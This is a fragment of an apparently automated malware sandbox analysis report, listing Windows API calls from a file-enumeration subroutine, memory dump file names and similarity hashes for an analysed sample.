                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 0096492C
                      • Part of subcall function 00964910: FindFirstFileA.KERNEL32(?,?), ref: 00964943
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FDC), ref: 00964971
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FE0), ref: 00964987
                      • Part of subcall function 00964910: FindNextFileA.KERNEL32(000000FF,?), ref: 00964B7D
                      • Part of subcall function 00964910: FindClose.KERNEL32(000000FF), ref: 00964B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: bd949531dc21a117bca1a8e012c06b4d5c12f029629078ccbf0eea654aaab282
                    • Instruction ID: 0d74a0e899d582e289a34d235b6087a7a82583aeab205b4d3c9c1a65c49d2b6e
                    • Opcode Fuzzy Hash: bd949531dc21a117bca1a8e012c06b4d5c12f029629078ccbf0eea654aaab282
                    • Instruction Fuzzy Hash: AE216576900208A7CB54FBB0DD86FEA337CABD4700F004559B65997191EE74AAC9CBE2